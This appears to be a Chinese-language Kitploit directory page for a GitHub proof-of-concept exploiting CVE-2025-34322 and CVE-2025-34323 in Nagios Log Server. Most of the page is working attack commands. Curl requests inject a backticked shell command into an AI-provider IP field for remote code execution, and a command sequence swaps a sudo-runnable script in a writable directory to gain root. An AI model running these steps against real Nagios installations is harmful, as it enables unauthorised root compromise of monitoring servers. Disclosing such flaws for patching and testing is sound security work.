Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-34322_CVE-2025-34323_Nagios_Log_Server — 针对 Nagios Log Server 中 CVE-2025-34322 和 CVE-2025-34323 的概念验证漏洞利用(PoC) | Kitploit
工具/GitHubGitHub/mcorybillington/cve-2025-34322_cve-2025-34323_nagios_log_server
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubmcorybillington/cve-2025-34322_cve-2025-34323_nagios_log_server

CVE-2025-34322_CVE-2025-34323_Nagios_Log_Server

针对 Nagios Log Server 中 CVE-2025-34322 和 CVE-2025-34323 的概念验证漏洞利用(PoC)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
29个月前尚未审核

CVE-2025-34322 和 CVE-2025-34323 Nagios Log Server

针对 Nagios Log Server 中 CVE-2025-34322 和 CVE-2025-34323 的概念验证漏洞利用,以及一个用于以 root 权限获取 shell 的组合脚本。

CVE-2025-34322

认证后,将你的会话 ID 替换到下面两条 curl 命令中。第一条命令设置要执行的命令,第二条命令将执行该命令:

root@kitploit:~
$ curl -s -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=<your-session-id>' --data 'csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d&natural_language_query=1&nlp_disclaimer=on&ai_provider=self_hosted&self_host_ip_address=`touch /tmp/rce`&ai_port=8000&saveglobals=1' http://192.168.122.198/nagioslogserver/admin/globals
$ curl -s -H 'Cookie: ls_session=<your-session-id>' http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query

CVE-2025-34323

www-data 用户拥有以 root 身份运行以下脚本的 sudo 权限:

root@kitploit:~
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/profile.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh

并且 /usr/local/nagioslogserver/scripts 目录是可写的

root@kitploit:~
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver$ ls -lah
total 44K
drwxrwxr-x 11 nagios nagios   4.0K Sep  7 16:34 .
drwxr-xr-x 12 root   root     4.0K Sep  7 16:29 ..
drwxrwxr-x  4 nagios nagios   4.0K Sep  7 16:20 etc
-rw-r--r--  1 root   root        0 Sep  7 16:34 .installed
drwxr-xr-x 14 nagios nagios   4.0K Sep  7 16:29 logstash
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:20 mibs
drwxr-xr-x 12 nagios nagios   4.0K Sep  7 16:20 opensearch
drwxrwxr-x  5 nagios nagios   4.0K Sep  7 16:20 pythonvenv
drwxrwxr-x  3 nagios nagios   4.0K Sep  7 16:20 scripts
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:36 snapshots
drwxrwxr-x  3 nagios www-data 4.0K Sep  7 16:36 tmp
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:31 var

因为 www-data 用户是 nagios 组的成员。因此,www-data 用户可以 移动 该目录中的任何文件,无论其所有者是谁。以下命令将移动一个 www-data 用户可以使用 sudo 权限执行的文件(reconfigure_ncpa.sh),然后用一个包含任意命令的新文件替换该文件:

root@kitploit:~
mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '<command>' > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
下载工具